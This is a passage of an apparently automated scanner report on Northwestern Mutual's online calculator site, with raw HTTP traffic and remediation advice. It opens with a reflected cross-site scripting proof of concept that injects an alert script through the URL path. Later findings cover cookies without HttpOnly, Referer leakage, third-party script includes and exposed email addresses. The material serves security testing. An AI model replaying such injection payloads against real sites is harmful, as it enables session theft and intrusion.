GET /tools/northwesternmutual38444%3Cscript%3Ealert(1)%3C/script%3E840a079bbd0a4657d/budget04dac1c<script>alert(1)</script>d58155a7500/tool.fcs?submittingPage=initial&pageToShow=&xxx=3000&Principal=3%2C000&xxx=10.00&LoanRate=10.00&xxx=12&TermBudget=12&xxx=150&MonthlyPayment=150&xxx=1&SavRate=1.00&xxx=33.80&TotalTaxRate=33.80&results.x=101&results.y=9 HTTP/1.1
Host: calculators.northwesternmutual.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/7
Cookie: s_nr=1325539923942; s_vi=[CS]v1|27810FBA051D1B73-40000137201DBAEE[CE]; h0dlkElivWJ*s3h4tGlDtWlCr2FFtXlxrQ@@=cjgCdzUGczUAeQ@@
Content-Length: 10


Response

HTTP/1.1 200 OK
Date: Mon, 02 Jan 2012 22:41:34 GMT
Server: Apache
Cache-Control: private
P3P: CP = "NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: JSESSIONID=cdbVjUwwl1EK79yJBLGst; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 1580


<!--This comment needs to be here for the page to render-->



...[SNIP]...
</script>840a079bbd0a4657d/budget04dac1c<script>alert(1)</script>d58155a7500/tool
</span>
...[SNIP]...

2. Cookie without HttpOnly flag set  previous  next
There are 5 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



2.1. http://calculators.northwesternmutual.com/tools/northwesternmutual/budget04/tool.fcs  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://calculators.northwesternmutual.com
Path:   /tools/northwesternmutual/budget04/tool.fcs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tools/northwesternmutual/budget04/tool.fcs HTTP/1.1
Host: calculators.northwesternmutual.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.northwesternmutual.com/financial-guidance/personal/starting-out/getting-married.aspx
Cookie: s_cc=true; s_nr=1325539348998; s_sq=%5B%5BB%5D%5D; s_sv_sid=333555204299; s_vi=[CS]v1|27810FBA051D1B73-40000137201DBAEE[CE]; ev1=life%20insurace%20annuity
Content-Length: 10


Response

HTTP/1.1 200 OK
Date: Mon, 02 Jan 2012 21:22:36 GMT
Server: Apache
Cache-Control: private
P3P: CP = "NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: h0dlkElivWJ*s3h4tGlDtWlCr2FFtXlxrQ@@=cjgCdzUGczUAeg@@; path=/; expires=Wed, 01-Feb-2012 21:22:36 GMT
Set-Cookie: JSESSIONID=adca26TWUm577754wtGst; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 44900


<!--The next line sets the width of the calc content to av
...[SNIP]...

2.2. http://calculators.northwesternmutual.com/tools/northwesternmutual/lifeins01/tool.fcs  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://calculators.northwesternmutual.com
Path:   /tools/northwesternmutual/lifeins01/tool.fcs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tools/northwesternmutual/lifeins01/tool.fcs HTTP/1.1
Host: calculators.northwesternmutual.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 Jan 2012 02:17:35 GMT
Server: Apache
Cache-Control: private
P3P: CP = "NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: h0dlkElivWJ*s3h4tGlDtWlCr2FFtXlxrQ@@=cjgCdzYEdzkFdA@@; path=/; expires=Thu, 02-Feb-2012 02:17:36 GMT
Set-Cookie: JSESSIONID=dbc-5vNI3miowhac4wHst; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 105312


<!--The next line sets the width of the calc content to av
...[SNIP]...

2.3. http://calculators.northwesternmutual.com/tools/northwesternmutual/savings03/tool.fcs  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://calculators.northwesternmutual.com
Path:   /tools/northwesternmutual/savings03/tool.fcs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tools/northwesternmutual/savings03/tool.fcs HTTP/1.1
Host: calculators.northwesternmutual.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 Jan 2012 02:17:32 GMT
Server: Apache
Cache-Control: private
P3P: CP = "NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: h0dlkElivWJ*s3h4tGlDtWlCr2FFtXlxrQ@@=cjgCdzYEdzgFdw@@; path=/; expires=Thu, 02-Feb-2012 02:17:32 GMT
Set-Cookie: JSESSIONID=bdcV-ik8F4v0lb9p3wHst; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52338


<!--The next line sets the width of the calc content to av
...[SNIP]...

2.4. http://calculators.northwesternmutual.com/tools/northwesternmutual/tools/view.fcs  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://calculators.northwesternmutual.com
Path:   /tools/northwesternmutual/tools/view.fcs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tools/northwesternmutual/tools/view.fcs HTTP/1.1
Host: calculators.northwesternmutual.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 Jan 2012 02:17:37 GMT
Server: Apache
Cache-Control: private
P3P: CP = "NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: JSESSIONID=abc_Bz9EY6BOf5WJ4wHst; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1494


<!--This comment needs to be here for the page to render-->



...[SNIP]...

2.5. http://calculators.northwesternmutual.com/tools/northwesternmutual38444%3Cscript%3Ealert(1)%3C/script%3E840a079bbd0a4657d/budget04/tool.fcs  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://calculators.northwesternmutual.com
Path:   /tools/northwesternmutual38444%3Cscript%3Ealert(1)%3C/script%3E840a079bbd0a4657d/budget04/tool.fcs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tools/northwesternmutual38444%3Cscript%3Ealert(1)%3C/script%3E840a079bbd0a4657d/budget04/tool.fcs?submittingPage=initial&pageToShow=&xxx=3000&Principal=3%2C000&xxx=10.00&LoanRate=10.00&xxx=12&TermBudget=12&xxx=150&MonthlyPayment=150&xxx=1&SavRate=1.00&xxx=33.80&TotalTaxRate=33.80&results.x=101&results.y=9 HTTP/1.1
Host: calculators.northwesternmutual.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/7
Cookie: s_nr=1325539923942; s_vi=[CS]v1|27810FBA051D1B73-40000137201DBAEE[CE]; h0dlkElivWJ*s3h4tGlDtWlCr2FFtXlxrQ@@=cjgCdzUGczUAeQ@@
Content-Length: 10


Response

HTTP/1.1 200 OK
Date: Mon, 02 Jan 2012 22:40:45 GMT
Server: Apache
Cache-Control: private
P3P: CP = "NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: JSESSIONID=abd8PB_Aiixj4_tUpLGst; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 1539


<!--This comment needs to be here for the page to render-->



...[SNIP]...

3. Cross-domain Referer leakage  previous  next
There are 4 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


3.1. http://calculators.northwesternmutual.com/tools/northwesternmutual/budget04/tool.fcs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://calculators.northwesternmutual.com
Path:   /tools/northwesternmutual/budget04/tool.fcs

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /tools/northwesternmutual/budget04/tool.fcs?win_width=940&win_height=830 HTTP/1.1
Host: calculators.northwesternmutual.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 Jan 2012 02:17:29 GMT
Server: Apache
Cache-Control: private
P3P: CP = "NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: h0dlkElivWJ*s3h4tGlDtWlCr2FFtXlxrQ@@=cjgCdzYEdzgAeQ@@; path=/; expires=Thu, 02-Feb-2012 02:17:29 GMT
Set-Cookie: JSESSIONID=adbAXPufvfAfN7sC2wHst; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44900


<!--The next line sets the width of the calc content to av
...[SNIP]...
<!-- END LFTOOL:ENABLE_FIELD_HIGHLIGHTING TAG -->

<script type="text/javascript" src="http://partners.leadfusion.com/tools/include/prototype/prototype.js" />
<script type="text/javascript">
...[SNIP]...
</script>

<script type="text/javascript" src="http://media.nmfn.com/sitecatalyst/nmprod/s_code.js"></script>
<script type="text/javascript" src="http://media.nmfn.com/sitecatalyst/nmprod/calc/sc_custom_leadfusion.js"></script>
...[SNIP]...
<span class="lfsitelink" > <a id="lfsitelink" href="http://www.leadfusion.com" target="new"> <img src="http://calculators.northwesternmutual.com/tools/admincenter/images/spacer.gif" width="1" height="1" border="0" alt=""/>
...[SNIP]...

3.2. http://calculators.northwesternmutual.com/tools/northwesternmutual/lifeins01/tool.fcs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://calculators.northwesternmutual.com
Path:   /tools/northwesternmutual/lifeins01/tool.fcs

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /tools/northwesternmutual/lifeins01/tool.fcs?win_width=940&win_height=830 HTTP/1.1
Host: calculators.northwesternmutual.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 Jan 2012 02:17:37 GMT
Server: Apache
Cache-Control: private
P3P: CP = "NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: h0dlkElivWJ*s3h4tGlDtWlCr2FFtXlxrQ@@=cjgCdzYEdzkGeQ@@; path=/; expires=Thu, 02-Feb-2012 02:17:37 GMT
Set-Cookie: JSESSIONID=dbaJ4ZQQqf98U_6z4wHst; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 105313


<!--The next line sets the width of the calc content to av
...[SNIP]...
<!-- END LFTOOL:ENABLE_FIELD_HIGHLIGHTING TAG -->

<script type="text/javascript" src="http://partners.leadfusion.com/tools/include/prototype/prototype.js" />
<script type="text/javascript">
...[SNIP]...
</script>

<script type="text/javascript" src="http://media.nmfn.com/sitecatalyst/nmprod/s_code.js"></script>
<script type="text/javascript" src="http://media.nmfn.com/sitecatalyst/nmprod/calc/sc_custom_leadfusion.js"></script>
...[SNIP]...
<span class="lfsitelink" > <a id="lfsitelink" href="http://www.leadfusion.com" target="new"> <img src="http://calculators.northwesternmutual.com/tools/admincenter/images/spacer.gif" width="1" height="1" border="0" alt=""/>
...[SNIP]...

3.3. http://calculators.northwesternmutual.com/tools/northwesternmutual/savings03/tool.fcs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://calculators.northwesternmutual.com
Path:   /tools/northwesternmutual/savings03/tool.fcs

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /tools/northwesternmutual/savings03/tool.fcs?win_width=940&win_height=830 HTTP/1.1
Host: calculators.northwesternmutual.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 Jan 2012 02:17:34 GMT
Server: Apache
Cache-Control: private
P3P: CP = "NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: h0dlkElivWJ*s3h4tGlDtWlCr2FFtXlxrQ@@=cjgCdzYEdzgFdA@@; path=/; expires=Thu, 02-Feb-2012 02:17:34 GMT
Set-Cookie: JSESSIONID=badURqOD0eTDQa1V3wHst; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52338


<!--The next line sets the width of the calc content to av
...[SNIP]...
<!-- END LFTOOL:ENABLE_FIELD_HIGHLIGHTING TAG -->

<script type="text/javascript" src="http://partners.leadfusion.com/tools/include/prototype/prototype.js" />
<script type="text/javascript">
...[SNIP]...
</script>

<script type="text/javascript" src="http://media.nmfn.com/sitecatalyst/nmprod/s_code.js"></script>
<script type="text/javascript" src="http://media.nmfn.com/sitecatalyst/nmprod/calc/sc_custom_leadfusion.js"></script>
...[SNIP]...
<span class="lfsitelink" > <a id="lfsitelink" href="http://www.leadfusion.com" target="new"> <img src="http://calculators.northwesternmutual.com/tools/admincenter/images/spacer.gif" width="1" height="1" border="0" alt=""/>
...[SNIP]...

3.4. http://calculators.northwesternmutual.com/tools/northwesternmutual/tools/view.fcs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://calculators.northwesternmutual.com
Path:   /tools/northwesternmutual/tools/view.fcs

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /tools/northwesternmutual/tools/view.fcs?param=p218pnRxtWwNpW1DoGBxqmF1syJ6sHQ2qnd*jWV_pDF1r1NlkCpDqnh1ikgNr2NCtWxHpndEpnZ_rnlEtmV8 HTTP/1.1
Host: calculators.northwesternmutual.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 Jan 2012 02:17:38 GMT
Server: Apache
Cache-Control: private
P3P: CP = "NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: JSESSIONID=bdau4ncy5TdkOaNN4wHst; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9880


<style>
.fc_text_font {
color: #000000;
text-decoration: none;
font-weight: normal;
font-size: 13px;
font-family: arial, helvetica;

...[SNIP]...
<span class="fc_text_font_bold">
<a href="http://www.leadfusion.com"><img src="http://calculators.northwesternmutual.com/tools/ImageServlet?param=qmFxpGlkunR1fmpCrGFUgyp5rmV3pk1UfkBWnEBfhENvlE1kiUNllVNkhlZdkENWlldVZ21DrEBxr2sNZ3d5tWlZhTE2sG95r010fipzrGJEpnxEimgNZ21DkXZ1
...[SNIP]...
<p><a href="http://www.leadfusion.com">Online Financial Tools</a>
...[SNIP]...
<br/>
<a href="http://www.leadfusion.com">http://www.leadfusion.com</a>
...[SNIP]...

4. Cross-domain script include  previous  next
There are 3 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


4.1. http://calculators.northwesternmutual.com/tools/northwesternmutual/budget04/tool.fcs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://calculators.northwesternmutual.com
Path:   /tools/northwesternmutual/budget04/tool.fcs

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tools/northwesternmutual/budget04/tool.fcs HTTP/1.1
Host: calculators.northwesternmutual.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.northwesternmutual.com/financial-guidance/personal/starting-out/getting-married.aspx
Cookie: s_cc=true; s_nr=1325539348998; s_sq=%5B%5BB%5D%5D; s_sv_sid=333555204299; s_vi=[CS]v1|27810FBA051D1B73-40000137201DBAEE[CE]; ev1=life%20insurace%20annuity
Content-Length: 10


Response

HTTP/1.1 200 OK
Date: Mon, 02 Jan 2012 21:22:36 GMT
Server: Apache
Cache-Control: private
P3P: CP = "NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: h0dlkElivWJ*s3h4tGlDtWlCr2FFtXlxrQ@@=cjgCdzUGczUAeg@@; path=/; expires=Wed, 01-Feb-2012 21:22:36 GMT
Set-Cookie: JSESSIONID=adca26TWUm577754wtGst; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 44900


<!--The next line sets the width of the calc content to av
...[SNIP]...
<!-- END LFTOOL:ENABLE_FIELD_HIGHLIGHTING TAG -->

<script type="text/javascript" src="http://partners.leadfusion.com/tools/include/prototype/prototype.js" />
<script type="text/javascript">
...[SNIP]...
</script>

<script type="text/javascript" src="http://media.nmfn.com/sitecatalyst/nmprod/s_code.js"></script>
<script type="text/javascript" src="http://media.nmfn.com/sitecatalyst/nmprod/calc/sc_custom_leadfusion.js"></script>
...[SNIP]...

4.2. http://calculators.northwesternmutual.com/tools/northwesternmutual/lifeins01/tool.fcs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://calculators.northwesternmutual.com
Path:   /tools/northwesternmutual/lifeins01/tool.fcs

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tools/northwesternmutual/lifeins01/tool.fcs HTTP/1.1
Host: calculators.northwesternmutual.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 Jan 2012 02:17:35 GMT
Server: Apache
Cache-Control: private
P3P: CP = "NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: h0dlkElivWJ*s3h4tGlDtWlCr2FFtXlxrQ@@=cjgCdzYEdzkFdA@@; path=/; expires=Thu, 02-Feb-2012 02:17:36 GMT
Set-Cookie: JSESSIONID=dbc-5vNI3miowhac4wHst; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 105312


<!--The next line sets the width of the calc content to av
...[SNIP]...
<!-- END LFTOOL:ENABLE_FIELD_HIGHLIGHTING TAG -->

<script type="text/javascript" src="http://partners.leadfusion.com/tools/include/prototype/prototype.js" />
<script type="text/javascript">
...[SNIP]...
</script>

<script type="text/javascript" src="http://media.nmfn.com/sitecatalyst/nmprod/s_code.js"></script>
<script type="text/javascript" src="http://media.nmfn.com/sitecatalyst/nmprod/calc/sc_custom_leadfusion.js"></script>
...[SNIP]...

4.3. http://calculators.northwesternmutual.com/tools/northwesternmutual/savings03/tool.fcs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://calculators.northwesternmutual.com
Path:   /tools/northwesternmutual/savings03/tool.fcs

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tools/northwesternmutual/savings03/tool.fcs HTTP/1.1
Host: calculators.northwesternmutual.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 Jan 2012 02:17:32 GMT
Server: Apache
Cache-Control: private
P3P: CP = "NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: h0dlkElivWJ*s3h4tGlDtWlCr2FFtXlxrQ@@=cjgCdzYEdzgFdw@@; path=/; expires=Thu, 02-Feb-2012 02:17:32 GMT
Set-Cookie: JSESSIONID=bdcV-ik8F4v0lb9p3wHst; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52338


<!--The next line sets the width of the calc content to av
...[SNIP]...
<!-- END LFTOOL:ENABLE_FIELD_HIGHLIGHTING TAG -->

<script type="text/javascript" src="http://partners.leadfusion.com/tools/include/prototype/prototype.js" />
<script type="text/javascript">
...[SNIP]...
</script>

<script type="text/javascript" src="http://media.nmfn.com/sitecatalyst/nmprod/s_code.js"></script>
<script type="text/javascript" src="http://media.nmfn.com/sitecatalyst/nmprod/calc/sc_custom_leadfusion.js"></script>
...[SNIP]...

5. Email addresses disclosed  previous
There are 3 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


5.1. http://calculators.northwesternmutual.com/tools/include/scriptaculous/controls.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://calculators.northwesternmutual.com
Path:   /tools/include/scriptaculous/controls.js

Issue detail

The following email address was disclosed in the response:

Request

GET /tools/include/scriptaculous/controls.js HTTP/1.1
Host: calculators.northwesternmutual.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://calculators.northwesternmutual.com/tools/northwesternmutual/budget04/tool.fcs
Cookie: s_cc=true; s_nr=1325539348998; s_sq=%5B%5BB%5D%5D; s_sv_sid=333555204299; s_vi=[CS]v1|27810FBA051D1B73-40000137201DBAEE[CE]; ev1=life%20insurace%20annuity; h0dlkElivWJ*s3h4tGlDtWlCr2FFtXlxrQ@@=cjgCdzUGczUAeQ@@; JSESSIONID=adb70kKK4Gh9649OwtGst
Content-Length: 10


Response

HTTP/1.1 200 OK
Date: Mon, 02 Jan 2012 21:22:42 GMT
Server: Apache
P3P: CP = "NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND UNI COM NAV INT DEM STA"
ETag: "CKApDGG1vnO"
Last-Modified: Thu, 29 Sep 2011 16:00:20 GMT
Cache-Control: max-age=5
Expires: Mon, 02 Jan 2012 21:22:47 GMT
Content-Length: 34868
Content-Type: application/x-javascript

// script.aculo.us controls.js v1.8.1, Thu Jan 03 22:07:12 -0500 2008

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2007 Ivan Krstic (htt
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...

5.2. http://calculators.northwesternmutual.com/tools/include/scriptaculous/dragdrop.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://calculators.northwesternmutual.com
Path:   /tools/include/scriptaculous/dragdrop.js

Issue detail

The following email address was disclosed in the response:

Request

GET /tools/include/scriptaculous/dragdrop.js HTTP/1.1
Host: calculators.northwesternmutual.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://calculators.northwesternmutual.com/tools/northwesternmutual/budget04/tool.fcs
Cookie: s_cc=true; s_nr=1325539348998; s_sq=%5B%5BB%5D%5D; s_sv_sid=333555204299; s_vi=[CS]v1|27810FBA051D1B73-40000137201DBAEE[CE]; ev1=life%20insurace%20annuity; h0dlkElivWJ*s3h4tGlDtWlCr2FFtXlxrQ@@=cjgCdzUGczUAeQ@@; JSESSIONID=adb70kKK4Gh9649OwtGst
Content-Length: 10


Response

HTTP/1.1 200 OK
Date: Mon, 02 Jan 2012 21:22:42 GMT
Server: Apache
P3P: CP = "NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND UNI COM NAV INT DEM STA"
ETag: "G3MB5PMx0e5"
Last-Modified: Thu, 29 Sep 2011 16:00:20 GMT
Cache-Control: max-age=5
Expires: Mon, 02 Jan 2012 21:22:47 GMT
Content-Length: 31605
Content-Type: application/x-javascript

// script.aculo.us dragdrop.js v1.8.1, Thu Jan 03 22:07:12 -0500 2008

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2007 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz)
//
// script.aculo.us is freely distributable under the terms of an MIT-style license.
// For details, see the script.aculo.us web site: http://script.aculo.us/

if(Object.isUndefined(Effect))
thr
...[SNIP]...

5.3. http://calculators.northwesternmutual.com/tools/northwesternmutual/tools/view.fcs  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://calculators.northwesternmutual.com
Path:   /tools/northwesternmutual/tools/view.fcs

Issue detail

The following email addresses were disclosed in the response:

Request

GET /tools/northwesternmutual/tools/view.fcs?param=p218pnRxtWwNpW1DoGBxqmF1syJ6sHQ2qnd*jWV_pDF1r1NlkCpDqnh1ikgNr2NCtWxHpndEpnZ_rnlEtmV8 HTTP/1.1
Host: calculators.northwesternmutual.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 Jan 2012 02:17:38 GMT
Server: Apache
Cache-Control: private
P3P: CP = "NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: JSESSIONID=bdau4ncy5TdkOaNN4wHst; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9880


<style>
.fc_text_font {
color: #000000;
text-decoration: none;
font-weight: normal;
font-size: 13px;
font-family: arial, helvetica;

...[SNIP]...
